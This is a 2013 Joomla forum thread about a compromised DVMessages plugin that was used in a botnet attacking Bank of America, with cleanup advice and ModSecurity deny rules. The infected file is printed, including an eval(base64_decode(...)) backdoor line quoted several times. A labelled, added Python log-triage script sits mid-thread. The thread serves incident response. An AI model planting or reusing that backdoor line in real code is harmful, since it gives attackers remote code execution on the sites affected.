The Joomla! Forum ™



Post new topic Reply to topic  [ 19 posts ] 
Posted: Wed Feb 20, 2013 10:15 pm | Joomla! Fledgling | Joined: Sun Jan 20, 2013 2:45 pm | Posts: 4
Is dvmessages.php a valid Joomla file? My host is claiming abuse notices from Bank of America, and we have double-checked everything and have not found any updated files...

We did notice that the Joomla error logs are not being populated recently... not sure how to get that going again, but the path in the site config seems fine.

We did find a few of the following in the raw logs...

184.173.241.57 - - [20/Feb/2013:15:07:23 +0000] "POST /plugins/system/dvmessages/dvmessages.php?action=status HTTP/1.0" 200 12 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"

We are currently using Akeeba admin to turn off the site temporarily.

So if you can tell us how to get logging back on and what else I should check...

Thanks


Posted: Sat Feb 23, 2013 11:18 am | Joomla! Fledgling | Joined: Sat Feb 23, 2013 9:47 am | Posts: 4
I have sort of the same question. The server that we have a contract with sent us an email.
It claims that 'dvmessages.php' in the 'plugins/system/dvmessages.php' path is malware. Do you have any experience with this?
I'm looking forward to your answers.
Regards,


Posted: Sat Feb 23, 2013 12:17 pm | Joomla! Master | Joined: Mon Mar 20, 2006 1:56 am | Posts: 12474 | Location: The Girly Side of Joomla in Sussex
Is this an extension plugin for http://extensions.joomla.org/extensions ... ames/10999 ?
What are the contents of the file?

As for your logging issues, try deleting the current log file and see if that will restart it. Check the logging settings with your host.

_________________
HU2HY - Poor questions = Poor answer
Unrequested help PMs will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}


Posted: Tue Feb 26, 2013 2:19 pm | Joomla! Apprentice | Joined: Wed Aug 24, 2005 5:31 pm | Posts: 37 | Location: Sweden
This is the second time I get a notice from the Abuse Team at Bank of America.
The code of the file is:
Code:
<?php
defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));
jimport( 'joomla.plugin.plugin' );
jimport( 'joomla.application.component.helper' );
class plgSystemDVMessages extends JPlugin
{
   var $message;

   function plgSystemDVMessages(& $subject, $config) {
      parent::__construct($subject, $config);
   }
   
   function onAfterInitialise()
   {
      global $_PROFILER, $mainframe, $database, $_SESSION;
      $plugin         =& JPluginHelper::getPlugin('system', 'dvmessages');
      $pluginParams   = new JParameter( $plugin->params );

      $document = &JFactory::getDocument();
      $temps = $mainframe->getMessageQueue();
      if ($temps) {
         foreach($temps as $temp) {
            if ($temp['message'] != '') {
               $messages = $temp;
            }
         }
      }

      if ($messages) {
         if($mainframe->isSite() && ($pluginParams->get('front_enable', 1)) ||
         !$mainframe->isSite() && ($pluginParams->get('admin_enable', 1))) {
            $type = '';
            if (($messages['type'] == 'notice') && ($pluginParams->get('show_notice', 1))) {
               $type = 'info';
            } elseif (($messages['type'] == 'warning') && ($pluginParams->get('show_warning', 1))) {
               $type = 'alert';
            } elseif (($messages['type'] == 'error') && ($pluginParams->get('show_error', 1))) {
               $type = 'error';
            } elseif (($messages['type'] == 'message') && ($pluginParams->get('show_message', 1))) {
               $type = 'info';
            }
            
            if ($type != '') {
               JHTML::_('behavior.mootools');
               $document->addScript(JURI::Root() . 'plugins/system/SEO/jquery.min.js');
               $document->addScript(JURI::Root() . 'plugins/system/SEO/jquery.easing.1.3.js');
               $document->addScript(JURI::Root() . 'plugins/system/SEO/SEObox.v1.2.jquery.js');
               $document->addStyleSheet(JURI::Root() . 'plugins/system/SEO/SEObox.css');
               
               $document->addScriptDeclaration("
                  jQuery.noConflict();         
                  jQuery(document).ready(function(){
                     Sexy.$type('".addslashes($messages['message'])."');
                  });
               ");
               
               if ($pluginParams->get('hide_css', 1)) {
                  $document->addScriptDeclaration("
                     jQuery.noConflict();
                     jQuery(document).ready(function(){
                        document.getElementById('system-message').style.display = 'none';
                     });
                  ");
               }
            }
         }
      }
      return true;
   }
}


The abuse team advised me to check with:
curl -A "Mozilla/4.0" -iL [URL]
I get
Code:
[root@srv5 dvmessages]# curl -A "Mozilla/4.0" -iL http://www.xxx/plugins/system/dvmessages/dvmessages.php
HTTP/1.1 200 OK
Date: Tue, 26 Feb 2013 14:18:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.20
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html


Any advice?

_________________
Pera
http://winstart.com


Posted: Tue Feb 26, 2013 6:45 pm | Joomla! Fledgling | Joined: Tue Feb 26, 2013 6:37 pm | Posts: 1 | Location: London, UK
Hello,

Oh, so I'm not the only one having this problem then :-[

I got a message today from my host stating there is suspicious code in ../plugins/system/dvmessages/dvmessages.php, and it may result in malicious activity. I cannot recall installing the mentioned extension. Is it possible it came with anything else?

Now when I'm checking the plugins folder there is no sign of dvmessages. How weird?


Posted: Tue Feb 26, 2013 8:37 pm | Joomla! Ace | Joined: Thu May 27, 2010 1:00 pm | Posts: 1106
@pera the first line
Code:
defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));
for sure doesn't look nice.

_________________
-- Ionut
http://www.medialup.com


Posted: Tue Feb 26, 2013 10:38 pm | Joomla! Fledgling | Joined: Tue Feb 26, 2013 10:25 pm | Posts: 1
My hosting provider just sent me a similar warning. Is it a cyber attack? I see nothing strange in the code... Can anyone please tell me where the attack is?


Posted: Wed Feb 27, 2013 3:39 pm | Joomla! Apprentice | Joined: Wed Aug 24, 2005 5:31 pm | Posts: 37 | Location: Sweden
The original file from
http://extensions.joomla.org/extensions ... ames/10999
dvmessages.php
Code:
<?php
/**

*/

// no direct access
defined( '_JEXEC' ) or die( 'Restricted access' );

jimport( 'joomla.plugin.plugin' );


But on the "infected" dvmessages.php
Code:
<?php
defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));
jimport( 'joomla.plugin.plugin' );


This is an old plugin for Joomla 1.5... is it best not to use it?

_________________
Pera
http://winstart.com


Posted: Wed Feb 27, 2013 6:53 pm | Joomla! Hero | Joined: Sat Oct 21, 2006 10:20 pm | Posts: 2727 | Location: Wisconsin USA
Well, obviously (based on the posted code) the code is now part of a larger hack, with likely more files installed somewhere on the site.

My advice is to disable and completely remove all traces of the plugin, and also you (and everyone jumping on with a "me too") are going to have to follow the advice and procedures here: viewtopic.php?f=621&t=582854 in order to properly remove the hack and clean the site(s).

I would NOT install or use the plugin after you have cleaned the site. It may or may not be the source of the site's insecurity, but until you know for sure, don't use it.

_________________
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator


Posted: Fri Mar 08, 2013 3:25 am | Joomla! Fledgling | Joined: Fri Mar 08, 2013 2:43 am | Posts: 1
This is definitely part of a larger effort. This is a very dangerous hack that is much, much larger than Bank of America, and all administrators should remove this plugin and follow the instructions from PhilD above. Additionally, if you administer your own server (i.e. a VPS or dedicated server), then you should also secure your temp directory (and also your Joomla temp directory, if different from your system temp). Below is an example of how you might be able to do that.

http://www.techrepublic.com/blog/openso ... -linux/171


Posted: Thu Mar 21, 2013 12:29 pm | Joomla! Fledgling | Joined: Thu Mar 21, 2013 12:27 pm | Posts: 1
Your server is now part of a botnet if you have this file (or others).

http://www.prolexic.com/news-events-pr-threat-advisory-ddos-itsoknoproblembro.html

The itsoknoproblembro botnet uses these files...

If you have these files on your Joomla (or WordPress) then your installation has been compromised by the automated attack tools the botnet uses. This would mean you have old versions of Joomla or WordPress installed.

You need to update Joomla / WordPress to the most recent versions, remove any components / plugins that are not being used, then audit all files uploaded to your hosting account for malicious changes / compromised back doors.


Posted: Fri Mar 22, 2013 9:21 pm | Joomla! Apprentice | Joined: Thu May 20, 2010 12:52 am | Posts: 10
This botnet has been firing up again the last couple of days. Tons of Joomla sites are being used to DDoS Bank of America.

According to access logs on affected servers, it looks like the malicious dvmessages.php files are being edited/uploaded using com_installer. If you have an infected dvmessages file that contains the bad eval statement, fix it:

Code:
change
defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));
to
defined( '_JEXEC' ) or die( 'Restricted access' );


The infection itself means that either your Joomla install is outdated and vulnerable (J1.5) or your administrator password was compromised. Upgrade your software and change your (super)Administrator password(s).


Posted: Thu Mar 28, 2013 5:05 pm | Joomla! Intern | Joined: Fri Jul 20, 2007 2:57 pm | Posts: 79 | Location: Pattaya & Surin/Thailand
skate323k137 wrote:
This botnet has been firing up again the last couple of days. Tons of Joomla sites are being used to DDoS Bank of America.

According to access logs on affected servers, it looks like the malicious dvmessages.php files are being edited/uploaded using com_installer. If you have an infected dvmessages file that contains the bad eval statement, fix it:

Code:
change
defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));
to
defined( '_JEXEC' ) or die( 'Restricted access' );


The infection itself means that either your Joomla install is outdated and vulnerable (J1.5) or your administrator password was compromised. Upgrade your software and change your (super)Administrator password(s).



So, we're all in the same boat... Three of my sites have been attacked and my host company sent me several complaints from Bank of America. Also, on my sites plugins/system/dvmessages.php was mentioned every time. I have now changed the parameters of all three files, but I don't think this will change much. My Joomla install is marked as updated, except on one site where I have to update manually.

Sorry to ask: "Upgrade your software" >> which software, please?

This is what my dvmessages.php file contains now:

params );
      $document = &JFactory::getDocument();
      $temps = $mainframe->getMessageQueue();
      if ($temps) {
         foreach($temps as $temp) {
            if ($temp['message'] != '') {
               $messages = $temp;
            }
         }
      }

      if ($messages) {
         if($mainframe->isSite() && ($pluginParams->get('front_enable', 1)) ||
         !$mainframe->isSite() && ($pluginParams->get('admin_enable', 1))) {
            $type = '';
            if (($messages['type'] == 'notice') && ($pluginParams->get('show_notice', 1))) {
               $type = 'info';
            } elseif (($messages['type'] == 'warning') && ($pluginParams->get('show_warning', 1))) {
               $type = 'alert';
            } elseif (($messages['type'] == 'error') && ($pluginParams->get('show_error', 1))) {
               $type = 'error';
            } elseif (($messages['type'] == 'message') && ($pluginParams->get('show_message', 1))) {
               $type = 'info';
            }

            if ($type != '') {
               JHTML::_('behavior.mootools');
               $document->addScript(JURI::Root() . 'plugins/system/SEO/jquery.min.js');
               $document->addScript(JURI::Root() . 'plugins/system/SEO/jquery.easing.1.3.js');
               $document->addScript(JURI::Root() . 'plugins/system/SEO/SEObox.v1.2.jquery.js');
               $document->addStyleSheet(JURI::Root() . 'plugins/system/SEO/SEObox.css');

               $document->addScriptDeclaration("
                  jQuery.noConflict();
                  jQuery(document).ready(function(){
                     Sexy.$type('".addslashes($messages['message'])."');
                  });
               ");

               if ($pluginParams->get('hide_css', 1)) {
                  $document->addScriptDeclaration("
                     jQuery.noConflict();
                     jQuery(document).ready(function(){
                        document.getElementById('system-message').style.display = 'none';
                     });
                  ");
               }
            }
         }
      }
      return true;
   }
}


Last edited by Sampao on Thu Mar 28, 2013 5:24 pm, edited 1 time in total.

Posted: Thu Mar 28, 2013 5:20 pm | Joomla! Apprentice | Joined: Thu May 20, 2010 12:52 am | Posts: 10
The only one of these I tracked down in domlogs tracked to com_installer. That should have been patched a long time ago. Are you in a shared hosting environment, like on a cPanel server with other customers? If so, you should ask your host if they've applied a patch to prevent cross-account symbolic links.

If you have root access you should install ConfigServer Firewall and mod_security. ConfigServer Firewall will block IPs that trip mod_security more than five times. If you make a modsec rule that denies the URI, the bots trying to hit it will be banned. Sometimes after you clean the file the bots still try to access it for days, causing high server load. Put this in modsec2.user.conf or one of your first includes files referenced in that file:

Code:
SecRule REQUEST_URI "/plugins/system/dvmessages.php" "chain,id:1234942,msg:dvmessages"
SecRule SERVER_NAME "domain.com"


Change domain.com to the site being attacked. If it affects several sites just make it a one-line rule:

Code:
SecRule REQUEST_URI "/plugins/system/dvmessages.php" "id:1234943,msg:dvmessages"
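As an added example (not from any poster here), the triage that the modsec rule and CSF's trip counter automate, done offline over an Apache access log: parse lines in the combined format of the raw log line in the first post, pick out requests to the backdoor path, list the sources that tripped it five or more times, and separately list sources that ever got a 200 back (the file was still there). Apart from the line quoted in the thread, the log lines are constructed, using documentation-range addresses.

```python
import re
from collections import Counter

# Apache combined log format, the layout of the raw log line in the first post.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')
BACKDOOR_PATH = "/plugins/system/dvmessages/dvmessages.php"

def _line(ip, method, uri, status, size, when="20/Feb/2013:15:07:23 +0000"):
    # Helper for the constructed sample below; same UA string as the real hit.
    return (f'{ip} - - [{when}] "{method} {uri} HTTP/1.0" {status} {size} '
            '"-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"')

# Constructed sample: the line quoted in the thread, one ordinary page view and
# six probes from a documentation-range address (203.0.113.0/24) after cleanup.
SAMPLE_LOG = [
    '184.173.241.57 - - [20/Feb/2013:15:07:23 +0000] "POST /plugins/system/'
    'dvmessages/dvmessages.php?action=status HTTP/1.0" 200 12 "-" '
    '"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"',
    _line("203.0.113.7", "GET", "/index.php?option=com_content", 200, 5120),
] + [_line("203.0.113.9", "POST", BACKDOOR_PATH + "?action=status", 404, 0)
     for _ in range(6)]

def parse_line(line: str):
    """Return the parsed fields (plus 'path', the URI without its query) or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = rec["uri"].split("?", 1)[0]
    return rec

def backdoor_requests(lines) -> list:
    """Every request aimed at the backdoor path, whatever the response code."""
    recs = (parse_line(ln) for ln in lines)
    return [r for r in recs if r and r["path"] == BACKDOOR_PATH]

def sources_to_block(lines, threshold: int = 5) -> list:
    """IPs that hit the path at least `threshold` times (CSF's trip count above)."""
    counts = Counter(r["ip"] for r in backdoor_requests(lines))
    return sorted(ip for ip, n in counts.items() if n >= threshold)

def live_backdoor(lines) -> list:
    """IPs that got a 200 back: the file was present and answered the request."""
    return sorted({r["ip"] for r in backdoor_requests(lines) if r["status"] == "200"})
```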


Posted: Thu Mar 28, 2013 5:49 pm | Joomla! Intern | Joined: Fri Jul 20, 2007 2:57 pm | Posts: 79 | Location: Pattaya & Surin/Thailand
To skate323k137:

Was that last message for me? If yes, I can't follow your instructions, honestly.


Posted: Thu Mar 28, 2013 6:36 pm | Joomla! Apprentice | Joined: Thu May 20, 2010 12:52 am | Posts: 10
It was, though it will help anyone in this situation if they are on a Linux server. Are you hosted on a shared server, or do you have root access to your hosting environment (i.e. VPS or dedicated server)?


Posted: Mon Apr 01, 2013 7:07 am | Joomla! Fledgling | Joined: Mon Apr 01, 2013 7:03 am | Posts: 2
The original file from
http://extensions.joomla.org/extensions ... ames/10999
dvmessages.php
What does smh mean?


Posted: Fri Apr 26, 2013 7:11 am | Joomla! Apprentice | Joined: Thu Jul 07, 2011 11:58 am | Posts: 30 | Location: South Africa
What extension has been infected and should be removed? It seems to have been removed from the extensions directory and I cannot see which one it is.

Thanks


Posted: Thu May 09, 2013 5:11 pm | Joomla! Ace | Joined: Sun Sep 25, 2005 5:29 am | Posts: 1410 | Location: Porto - Portugal
PseudZ wrote:
What extension has been infected and should be removed? It seems to have been removed from the extensions directory and I cannot see which one it is.

Thanks

The extension reported here is
DVMessages - http://archive.extensions.joomla.org/ex ... ames/10999

_________________
Tutorials: Online translation for Joomla core and extensions: https://sites.google.com/site/transjoomla
- Portuguese Joomla Community / Joomla pt-PT Translation Team

